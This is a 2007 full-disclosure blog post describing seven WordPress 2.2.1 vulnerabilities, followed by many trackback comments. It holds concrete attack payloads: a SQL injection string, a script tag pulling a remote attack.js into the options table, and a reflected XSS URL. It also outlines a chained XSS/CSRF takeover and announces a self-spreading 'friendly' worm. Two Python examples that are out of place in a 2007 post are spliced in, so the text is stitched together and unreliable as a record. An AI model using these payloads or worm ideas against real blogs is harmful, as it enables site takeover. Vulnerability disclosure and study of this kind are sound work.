Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)
July 31st, 2007
Much time has passed since I wrote the last Full Disclosure publication on this blog; it was about the security vulnerability in Akismet, a Wordpress antispam plugin.
This time you will witness something that impacts huge parts of the Blogosphere. Here is my story:
Yesterday, I discovered seven new Wordpress vulnerabilities which may lead to a successful blog compromise under appropriate circumstances.
1. Wordpress Persistent XSS Vulnerability in the Default Theme (v.2.2)
Affected Script: /themes.php?page=functions.php
The “Header Image and Color” section of the default theme Kubrick is affected.
Severity: HIGH - Attack needs no authentication.
Affected Wordpress Build: 2.2 (I know this has been submitted to full-disclosure before, but I had already written down the article and made the sample exploits, so I did not want to delete these parts afterwards.)
WARNING: This issue may lead to a full blog compromise if the default theme is enabled!
The vulnerability is some weeks old, and because of that I don’t include it in my Wordpress PoC XSS Blog Worm; more on this topic at the end of this post.
2. Wordpress /options.php SQL Injection Vulnerability
Affected Scripts: All Wordpress files referencing /options.php in a form field. This includes:
- /options-general.php
- /options-writing.php
- /options-reading.php
- /options-discussion.php
- /options-privacy.php
- /options-permalink.php
- /options-misc.php
Severity: LOW - Attacker needs Administrator privileges or a valid _wpnonce.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
So what causes the database error shown in the screenshot?
When one of the scripts listed above sends a POST request to /options.php, the value of page_options is NOT filtered.
This allows any user with Admin privileges to manipulate database queries and/or values. Of course this can be used for further exploitation, as I’ll show in the next part of this advisory.
By the way, the affected SQL query is
SELECT option_value FROM wcblog_options
WHERE option_name = '$page_options'
So $page_options may be used for SQL injection. That means if it contains a value like ' AND '1'='1, the query is processed successfully AND a new key called $page_options will be created in the database table wp_options.
Some of you, my dear readers, may have noticed that we now have the ability to create new database keys plus corresponding values. This smells of persistent XSS, and another Wordpress feature is helping us here:
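To make the behaviour described above concrete, here is an added Python model (not code from this post and not Wordpress code) of the unfiltered lookup against a constructed in-memory copy of wp_options, beside the parameter-bound form that a fix would use; the schema, the two sample rows and the create-if-missing step are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the wp_options table (assumption: two
# sample rows; this is not WordPress code and not its real schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_options (option_name TEXT PRIMARY KEY, option_value TEXT)")
    db.execute("INSERT INTO wp_options VALUES ('blogname', 'mybeNi websecurity')")
    db.execute("INSERT INTO wp_options VALUES ('admin_email', 'admin@example.invalid')")
    db.commit()
    return db

def vulnerable_lookup(db, page_options):
    """Models the unfiltered query from the post: the request value is pasted
    straight into the SQL text, so quote characters in it become SQL syntax."""
    sql = "SELECT option_value FROM wp_options WHERE option_name = '%s'" % page_options
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def vulnerable_update(db, page_options, value):
    """Models the create-if-missing step: when the lookup finds nothing, the raw
    string is stored as a new option_name, which is how an injected value such as
    ' AND '1'='1 ends up as a key in the table."""
    if vulnerable_lookup(db, page_options) is None:
        db.execute("INSERT INTO wp_options VALUES (?, ?)", (page_options, value))
        db.commit()

def query_survives(db, page_options):
    """True if the unfiltered query still parses and runs for this input."""
    try:
        vulnerable_lookup(db, page_options)
        return True
    except sqlite3.OperationalError:
        return False

def safe_lookup(db, page_options):
    """Hardened form: parameter binding ships the value separately from the SQL
    text, so quotes in it are data and can never alter the query's structure."""
    row = db.execute("SELECT option_value FROM wp_options WHERE option_name = ?",
                     (page_options,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for probe in ("blogname", "'", "' AND '1'='1"):
        print(repr(probe), "unfiltered query runs:", query_survives(db, probe),
              "| bound lookup returns:", safe_lookup(db, probe))
```

A lone quote breaks the unfiltered query, while the ' AND '1'='1 value keeps it syntactically valid and is then stored verbatim as a new option name; the bound lookup treats both as plain strings.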
3. Wordpress /options.php Information Disclosure
Severity: MEDIUM - All blog options are listed on a single page and may be accessed, for example, via XSS.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
Why is this security risk categorized as MEDIUM?
If /options.php is accessed by an Administrator without any parameters, it just dumps the whole database table wp_options, including all blog settings such as the secret hash, the Administrator’s email addresses and other configuration data.
The whole script runs WITHOUT ANY OUTPUT VALIDATION - we can trust the data coming from our own database, can we?!
And this very issue leads us directly towards another, much more critical threat:
4. Wordpress /options.php Persistent XSS Vulnerability
Severity: MEDIUM - Persistent XSS in the Admin Panel; nevertheless, the attacker needs Administrator privileges or a valid _wpnonce.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
Let’s assume an attacker is able to combine points 2) and 3) of this post by using an XSS vulnerability. The XSS flaw may exist either in the blog software itself (in this case Wordpress), in a third-party plugin, or in other custom-made scripts on the same webserver/domain.
This would allow a complete blog takeover, wouldn’t it? The concept behind this combined XSS / CSRF attack is:
- Use an XSS flaw and vulnerability 2) in combination to insert something like <script src=http://yourpage.com/attack.js ></script> into the Wordpress options database table. Of course, before doing this, you need to extract the _wpnonce Wordpress Administration Panel token using some JavaScript code and XMLHttpRequest; this is very basic JavaScript and easy to accomplish for a skilled attacker.
- Afterwards, you just have to send the Administrator to /options.php and the JavaScript code will be executed.
5. Wordpress /edit-comments.php Database Error (Bug)
Severity: NONE
Affected Wordpress Version: 2.2.1 - the latest version
In /edit-comments.php, the parameter apage is not properly sanitized before it is used to calculate the rows from which Wordpress tries to pull the comments.
So if apage has a negative numerical value, Wordpress throws a database error caused by a corrupted SQL query, which can be seen in the picture. It tries to SELECT all data from the table between rows -40 and 25, and this, of course, does not work.
6. Wordpress /link-import.php XSS Vulnerability
Severity: LOW - Attacker needs Administrator privileges or a valid _wpnonce.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)

The parameter opml_url isn’t sanitized and thereby creates a Cross-Site Scripting vulnerability.
Anyway, for a successful attack the _wpnonce authentication token is needed, so this one is quite useless: no one would use XSS to get a token in order to use another XSS vulnerability on the same domain.
As usual, I made a shiny picture of this flaw “in action”.
7. Wordpress /upload.php XSS Vulnerability
Severity: HIGH - Attack needs no authentication.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
WARNING: This issue may lead to a full blog compromise.
In /upload.php the parameter style is prone to XSS attacks when editing temporary uploads (they usually have a negative ID). An attack could look like this: /upload.php?style=%22%3E{shellcode}&tab=upload&post_id=-1337
As you can see, this is a very basic reflective XSS vulnerability. This shouldn’t happen in a web application.
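From the defender’s side, the reflected style parameter is easy to spot in web server logs and easy to neutralize on output. The following added Python example (not code from this post or from Wordpress) scans constructed access-log lines for /upload.php requests whose decoded style value contains attribute-breaking characters, and shows the entity-encoded form that a fixed template would emit; the log format and sample lines are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The last one carries
# the request shape from the post: /upload.php?style=%22%3E{shellcode}&tab=upload&post_id=-1337
SAMPLE_LOG = """\
192.0.2.10 - - [31/Jul/2007:10:01:02 +0200] "GET /upload.php?style=inline&tab=upload&post_id=12 HTTP/1.1" 200 512
192.0.2.11 - - [31/Jul/2007:10:01:09 +0200] "GET /index.php HTTP/1.1" 200 4096
192.0.2.12 - - [31/Jul/2007:10:02:41 +0200] "GET /upload.php?style=%22%3E{shellcode}&tab=upload&post_id=-1337 HTTP/1.1" 200 640
"""

# Common log format: client IP, identd, user, timestamp, request line, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)')
# Characters that can close an HTML attribute or open a tag when echoed unescaped.
MARKUP_RE = re.compile(r'[<>"\']')

def flag_style_injections(log_text):
    """Return (client ip, decoded style value) for every /upload.php request whose
    style parameter, after percent-decoding, contains attribute-breaking characters."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if parts.path != "/upload.php":
            continue
        # parse_qs percent-decodes, so %22%3E is compared as the characters "> here.
        for style in parse_qs(parts.query).get("style", []):
            if MARKUP_RE.search(style):
                hits.append((m.group("ip"), style))
    return hits

def style_attr(style):
    """Hardened output: the value is entity-encoded before it is placed inside the
    attribute, so a quote or angle bracket in the input stays inert text."""
    return 'style="%s"' % html.escape(style, quote=True)

if __name__ == "__main__":
    for ip, style in flag_style_injections(SAMPLE_LOG):
        print("suspicious style parameter from %s: %r -> rendered as %s"
              % (ip, style, style_attr(style)))
```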
If you have read my post up to this point, I may have convinced you that XSS blog worms affecting “real” homepages are more than just a theory; this concept is ready to attack.
During my research on this “Wordpress Vulnerability Assessment” (it took 2 (TWO!) days to find these flaws) I realized again that Cross-Site Scripting is the most dangerous threat out there. It can cause everything from a harmless defacement or a single blog post up to a manipulation of the theme’s PHP files to include a remote shell, or the enabling of the Post-via-Email feature, a very funny Wordpress “feature”.
Some more things XSS can do to your blog using the vulnerabilities above:
- Grab your Blog’s complete RSS Feed using Wordpress’ built-in “Export” function.
- Add some new blog posts with funny ads, more exploits or random jokes by including a remote feed using Wordpress’ built-in “Import” function.
- Add Blogroll Links
- Add another Administrator with Password “test”
- Delete your Blogposts (that sucks)
- manipulate Plugins
- change any .php file stored within the Wordpress Directories by using Wordpress’ built-in File Editor
- just everything you as a blog Administrator can do…
And this is why XSS flaws are the most dangerous vulnerabilities in the wild, and it is sad that so many homepages are affected: not only your small Wordpress blogs but also Google, Ebay, Blogspot and nearly every member of the Alexa Top 500.
XSS takes this huge leap by controlling vulnerable web applications’ user interfaces so gallantly, cross-browser and cross-platform... it just rocks!
Based on these Exploits I will create a Proof-of-Concept XSS Wordpress Worm which will try to fix these Vulnerabilities. :o)
– Benjamin Flesch
mybeNi websecurity
UPDATE:
I submitted the links to the Wordpress bug tracker:
- Wordpress uploads.php Cross-Site Scripting Vulnerability
- Wordpress options.php SQL Injection Vulnerability
- Wordpress link-import.php Cross-Site Scripting (XSS) Vulnerability
- Wordpress /edit-comments.php Database Error (Bug)
The XSS BlogWorm patching the Vulnerabilities is launched now!
July 31st, 2007 at 02:19
[…] my small world full of websecurity, overall security, safety and… security in the web. nah, kiddin’ « previous post: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm […]
July 31st, 2007 at 04:31
[…] AJAX XSS Worm for Wordpress published: July 31st, 2007 beNi has discovered several interesting vulnerabilities for Wordpress and has coded a friendly AJAX XSS worm that […]
July 31st, 2007 at 05:33
[…] a few hours ago 7 security problems were reported in […]
July 31st, 2007 at 05:42
[…] beNi released 7 zero-day vulnerabilities for WordPress today as well as the first weblog worm, which topic has interested me for some time now… […]
August 1st, 2007 at 01:31
[…] More here. […]
August 1st, 2007 at 05:20
[…] http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nea… […]
August 1st, 2007 at 06:54
[…] dangerous holes in Wordpress. Tecchannel reports today that IT security specialist Benjamin Flesch has found seven new holes in Wordpress, which “mainly […]
August 1st, 2007 at 07:37
[…] I just read on buayacorp that a few hours ago 7 security problems were reported in […]
August 1st, 2007 at 08:56
[…] What are we to make of this: This is the first Weblog XSS Worm? More on the 7 affected holes in the blogging system: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated). […]
August 1st, 2007 at 09:35
WordPress XSS and worm…
Using hole-patching as an XSS demo? o_O
Today I saw an article saying someone found 7 WordPress XSS vulnerabilities (he has already reported them upstream, but the patch doesn’t seem to be in yet; see #4689, #4690, #4691, #4692 for details); and to demo these XS…
August 1st, 2007 at 11:26
[…] in Wordpress that can lead to a successful compromise of the blog under appropriate circumstances. They are all detailed on his blog, but what is special is that he has created a proof of concept of a worm that affects the popular […]
August 1st, 2007 at 12:49
[…] 2 of them rated as critical, discovered in the popular blog software Wordpress. On his private blog he presents further information on this, as well as a proof-of-concept blog worm which, with the help of […]
August 1st, 2007 at 02:24
Seven new holes in Wordpress…
Version 2.2.1 is affected and a fix will probably only come in 2.2.2. No, I’m not getting worked up this time!
……
August 1st, 2007 at 02:37
[…] received from TecChannel.de (here and here). The thing is that Benjamin Flesch discovered seven holes in WordPress 2.2.1 and wrote a friendly worm for them, which does not exploit the hole but […]
August 1st, 2007 at 04:21
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)… Yesterday, I discovered five seven new Wordpress vulnerabilities which may lead to a successful blog compromise under appropriate circumstances (tags: security wordpress) […]
August 1st, 2007 at 04:25
[…] serious security vulnerabilities in Wordpress have been discovered by Benjamin Flesch. The Wordpress team has already fixed them, but since they don’t announce it, I will. Your blog will […]
August 1st, 2007 at 10:24
[…] a friend made a worm using a WordPress 2.2 XSS vulnerability. (beNi has discovered several interesting vulnerabilities for Wordpress and has coded a friendly AJAX XSS worm that […]
August 1st, 2007 at 11:46
[…] easy to understand; alex concha has already done it, and rewriting what has been written is somewhat silly. The author’s page also explains it very explicitly, but I only recommend it to those who know English, and by the way I advise you not to take it so […]
August 2nd, 2007 at 12:37
[…] the discovery was made by Benjamin Flesch, and although the Wordpress team has updated it in the development SVN, no announcement has been made to […]
August 2nd, 2007 at 02:18
[…] from Blog-Abfertigung pointed yesterday to the security holes discovered by IT security specialist Benjamin Flesch. Benjamin Flesch even rates two of them “as high […]
August 2nd, 2007 at 03:30
[…] the first Wordpress worm has been released, which … a Cross Site Scripting (XSS) hole…. Luckily it is friendly and helps Wordpress users close it directly. […]
August 2nd, 2007 at 04:19
[…] Great, 7 new holes discovered in Wordpress 2.2.1 in one go. There is no official fix yet, but there is a “friendly worm” which […]
August 2nd, 2007 at 05:25
[…] is all you have to do if you want to patch your current wordpress installation Thanks to Benjamin for this […]
August 2nd, 2007 at 10:02
[…] said: mybeNi has found and published seven holes in WordPress. The main thing is that one doesn’t slowly get used to this bad news […]
August 2nd, 2007 at 10:17
[…] More info here: this is the first weblog xss worm wordpress zeroday vulnerability […]
August 2nd, 2007 at 10:59
[…] you know that the latest version of Wordpress contains at least seven security vulnerabilities that could compromise your blog ? If you use Wordpress you should make […]
August 2nd, 2007 at 11:10
[…] mybeni exactly one of these holes in order to patch them. Interesting proof-of-concept worm! More detailed info, including the possibility to fix the bugs, can of course be found…! Share and Enjoy: These icons link to social bookmarking sites where readers can share and […]
August 2nd, 2007 at 12:44
Your script does not check if the files are writable.
Any chance you add that? Otherwise ppl might think they are patched while they are not
August 2nd, 2007 at 02:19
[…] this guy discovered seven vulnerabilities in the latest version of Wordpress and decided to write a worm that will go into your site and […]
August 2nd, 2007 at 03:09
[…] latest “batch of holes” discovered in Wordpress includes no fewer than seven, which would not deserve any comment here if it were not for the ingenious system that their discoverer […]
August 2nd, 2007 at 03:28
[…] I’ve been getting a lot of questions about this post by Benjamin Flesch, so here’s a quick […]
August 2nd, 2007 at 04:35
[…] Flesch has discovered 7 security holes (XSS holes) in Wordpress 2.2.1 and also […]
August 2nd, 2007 at 06:50
Nasty security holes in WordPress yet again…
A whole series of new vulnerabilities in the most popular blog hosting system cries out for a quick remedy. On request, an unusually friendly worm takes care of damage prevention.
……
August 2nd, 2007 at 07:32
Seven security flaws for WordPress 2.2 and 2.0…
The news is not “new”, since it is from a few days ago, but I had not covered it until now because I was busy reviewing (within my limitations) code to see how it affects the 2.0.x branch.
As you know, two branches are currently in use…
August 2nd, 2007 at 11:49
[…] on this page you will find each of the vulnerabilities duly explained. On this other one you can find […]
August 3rd, 2007 at 01:59
The first worm for wordpress…
So this is what happened. Version 2.2 is affected; earlier ones apparently not.
Update an hour later: One(?) of the holes is also present in 2.1.1.
The fix:
w…
August 3rd, 2007 at 04:24
[…] Article on mybeni.rootzilla.de Article on heise.de […]
August 3rd, 2007 at 05:11
[…] and cross-site scripting holes in Wordpress have been published by Benjamin Flesch on his blog. Four of these holes, however, require a login as Administrator, which in my opinion […]
August 3rd, 2007 at 08:44
[…] 7 new security flaws have been discovered in WordPress 2.2.1 (although they also affect the branch […]
August 3rd, 2007 at 09:19
[…] has not only found seven new security holes in the latest version (2.2.1) of Wordpress, but also directly a […]
August 3rd, 2007 at 05:18
[…] Since Tuesday several new security holes in Wordpress 2.2.1 have been known. Unfortunately the discoverer let himself get carried away into describing the holes in detail […]
August 4th, 2007 at 10:42
[…] Flesch points out seven Wordpress XSS exploits that could be used partially or en totalis to create a 0day Wordpress worm that […]
August 5th, 2007 at 02:14
[…] upgraded wordpress to 2.2.1, with built-in Widgets support, and used the friendly worm to patch the holes. […]
August 5th, 2007 at 02:36
[…] these are purely security updates. Most of these security holes were uncovered by mybeNi. The German version is expected during the course of the day […]
August 5th, 2007 at 02:42
[…] Flesch has 7 XSS security holes in WordPress version 2.2.1 […]
August 5th, 2007 at 02:42
[…] | Wordpress 5 days ago Benjamin Flesch drew attention to several new security holes in WordPress and subsequently even published a benign worm which [handles] the problems by exploiting the […]
August 5th, 2007 at 05:06
[…] course - like this business is - the Wordpress Developers don’t even mention that I found all these bugs in their Webapplication and even submitted them to their bugtrack which saved them a lot of […]
August 5th, 2007 at 06:08
WordPress 2.2.2 and 2.0.11 security release…
Last week mybeni pointed out various security holes in the current WordPress versions that allow attacks via XSS and SQL injection.
WordPress has now responded to these security holes and two security updat…
August 5th, 2007 at 08:56
[…] consists of a cross site scripting vulnerability found in uploads.php and reported by the mybeNi blog, while in the 2.0 branch the most serious vulnerability consists of a blind SQL injection fishing exploit […]
August 5th, 2007 at 09:00
[…] in Wordpress Article on mybeni.rootzilla.de Article on […]
August 5th, 2007 at 11:07
[…] addresses 1 of the 7 security issues found on this page last […]
August 5th, 2007 at 01:00
[…] is a blog entry about 7 Wordpress vulnerabilities that seems to have provoked today’s Wordpress […]
August 5th, 2007 at 03:14
[…] August 5, 2007 @ 9:14 pm } · { Manuals } In just 1 day, Benjamin Flesch has discovered seven vulnerabilities in Wordpress, which apparently have already been […]
August 5th, 2007 at 03:28
WordPress Update 2.2.2…
A few days ago some security holes surfaced in the Wordpress system. One of the discoverers of the holes had already programmed a small self-written script worm to close them, which the biggest …
August 5th, 2007 at 06:11
[…] has posted 7 zero-day cross site scripting vulnerabilities that todays upgrade fixes. These can be some nasty stuff and could cost you your whole blog if you […]
August 5th, 2007 at 06:36
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated) […]
August 5th, 2007 at 06:41
[…] motivation, here’s what can happen to you if you don’t upgrade…courtesy of mybeNi, who originally found the […]
August 5th, 2007 at 09:23
too bad most of the hacks here totally screw up the blog….
August 6th, 2007 at 01:54
[…] as Benjamin Flesch found out a few days ago, version 2.2.1 has seven small to severe security holes, which were also promptly fixed after 6 days by the WordPress developer team […]
August 6th, 2007 at 01:08
[…] addresses 1 of the 7 security issues found on this page last […]
August 7th, 2007 at 09:16
[…] upgrade your install. There has been several security fixes in the new update that address these security exploits here. The upgrade was smooth, all I did was deactivate all my plugins, uploaded the new files […]
August 9th, 2007 at 11:40
[…] That’s what I imagine a Yahoo Sysadmin saying all day. If you really need to use Wordpress, make sure you check for updates periodically - the past showed that this Software bears a lot of flaws! […]
August 14th, 2007 at 05:00
Xss Wordpress Worm promises but……
A few days ago mybeni identified no fewer than seven vulnerabilities in the Wordpress blogging platform, confirmed by the organisation itself. In the wake of this Full Disclosure the same researcher built a benign XSS worm that hel…
August 23rd, 2007 at 05:32
How do you figure attacks which require admin access are of high severity? Being admin makes doing far fetched SQL injection attacks and reflective XSS kind of pointless, doesn’t it?
That’s like saying there’s a local privilege escalation vulnerability on windows that requires you to be local admin.
August 25th, 2007 at 05:25
Hello Christ1an, the problem is that by using the Admin’s authentication tokens you’d be able to add, for example, another administrator or stuff.. just by using wordpress’ functions.
August 30th, 2007 at 07:54
[…] latest version of Wordpress contains at least seven security vulnerabilities that could compromise your blog. If you use Wordpress you should make sure […]
September 9th, 2007 at 09:08
[…] Source […]
September 11th, 2007 at 05:00
[…] is available for download in version 2.2.2. If you are still using 2.2.1, you should, because of the security holes, definitely […] to the new version
September 15th, 2007 at 03:27
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick and why mybeNi nearly wrote the first Blog Worm. […]
October 26th, 2007 at 01:58
[…] Read complete article at Rootzilla. […]
November 18th, 2007 at 01:57
[…] Although we will never really know what the worm might actually be doing. According to its author, what it does is patch WordPress so that nothing bad can happen to you; after all, if he […]
December 26th, 2007 at 08:33
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick, a remarkable article on WordPress security vulnerabilities, has been updated to include vulnerabilities in Akismet as well. […]
January 30th, 2008 at 07:23
[…] Further info here. […]
January 30th, 2008 at 11:51
New vulnerabilities in WordPress 2.2.1…
On the 31st someone published a related vulnerability; original page: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated) ~ mybeNi websecurity. It has already been w…
February 8th, 2008 at 05:48
[…] the full explanation here. (in […]
February 15th, 2008 at 03:35
[…] Tip #3: Don’t use the default Kubrick theme (V2.2), because it contains a security hole: /themes.php?page=functions.php in Header Image and Color. More info. […]
September 10th, 2008 at 09:13
[…] Further info here. […]
September 13th, 2008 at 09:38
[…] For more, see here. […]
October 29th, 2008 at 08:21
oh yeah, one more thing I can be ticklish about my ugly museum Sorry, for off top, i wanna tell one joke) What do you call bedtime stories for boats? Ferry tales.
December 1st, 2008 at 07:55
great job! thx